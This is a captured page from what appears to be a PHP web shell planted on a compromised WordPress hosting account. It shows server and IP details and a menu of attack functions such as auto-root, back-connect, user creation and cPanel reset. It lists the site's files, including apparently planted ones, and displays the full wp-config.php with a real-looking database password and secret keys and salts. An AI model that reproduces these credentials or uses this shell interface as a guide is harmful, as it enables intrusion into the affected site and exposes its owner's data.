Linux server241.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 199.188.200.87 | : 216.73.216.149
Cant Read [ /etc/named.conf ]
8.0.30
emerlyju
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
emerlyju /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
cgi-bin
[ DIR ]
dr-xr-xr-x
wp-admin
[ DIR ]
dr-xr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
dr-xr-xr-x
.hcflag
31
B
-r-xr-xr-x
.htaccess
649
B
-r--r--r--
.litespeed_flag
297
B
-rw-r--r--
admin.php
41.11
KB
-r-xr-xr-x
error_log
438.85
KB
-r-xr-xr-x
index.php
12.29
KB
-r--r--r--
license.txt
19.44
KB
-r-xr-xr-x
lock.php
1.93
KB
-rw-r--r--
readme.html
7.25
KB
-r-xr-xr-x
stg.txt
1
B
-r-xr-xr-x
style.php
26
B
-r-xr-xr-x
w-w.gz
70.99
KB
-r-xr-xr-x
w-w.php
139
B
-r-xr-xr-x
wp-activate.php
7.18
KB
-r-xr-xr-x
wp-comments-post.php
2.27
KB
-r-xr-xr-x
wp-config-sample.php
3.26
KB
-r-xr-xr-x
wp-config.php
3.19
KB
-r-xr-xr-x
wp-links-opml.php
2.43
KB
-r-xr-xr-x
wp-load.php
3.84
KB
-r-xr-xr-x
wp-login.php
50.23
KB
-r-xr-xr-x
wp-mail.php
8.52
KB
-r-xr-xr-x
wp-settings.php
30.33
KB
-r-xr-xr-x
wp-signup.php
33.71
KB
-r-xr-xr-x
wp-trackback.php
5.09
KB
-r-xr-xr-x
xmlrpc.php
3.13
KB
-r-xr-xr-x
xw.zip
4.75
KB
-r-xr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php define( 'WP_CACHE', true ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'emerlyju_wp585' ); /** Database username */ define( 'DB_USER', 'emerlyju_wp585' ); /** Database password */ define( 'DB_PASSWORD', ']oM(!Sph27Fo1J@[' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '0ketgn6uri5baffo9o2zjqbexljmzfryqlyjnt6stnzyhwwbh9v52t0ux8bltqbq' ); define( 'SECURE_AUTH_KEY', 'vdpdjyo4sjhaulusyrgrsvlq2xjkxd2vtwr1g7ftrxg5yngtffmw7t5uciuurxo9' ); define( 'LOGGED_IN_KEY', 'ce6ckbadnkibxjxzdvx2d7kdjwboomxj19dglnxc3c4xaw8owoybc7ww8alf0ons' ); define( 'NONCE_KEY', 'bfpz9ffwrew8ngcbqbvyqabfxj5re46phspn6nctompe4kq16jiwsrkua2ashyxl' ); define( 'AUTH_SALT', 'wz5hwchlyhmyjw6g41sh8cb47jo9uer4ewbwklcbdwyhb2i6iymillfqcolyv4bq' ); define( 'SECURE_AUTH_SALT', 'vezieqj1hajcukkmge5ptavaezro0alxhtjgrwbgqw5gvafn5ncleqdgrymcfirb' ); define( 'LOGGED_IN_SALT', 'qzitiib8abj1hrehca3s8ijeaabsoxtdeaqmr9hvwgg3ic8sfxibdz9b41ht46sj' ); define( 'NONCE_SALT', 'vyf2rmcxjlmf93otekpk4hq65m9qsx7ryn0lgzg0vgps0gbxe4og41yxitr56qi7' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wpvb_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close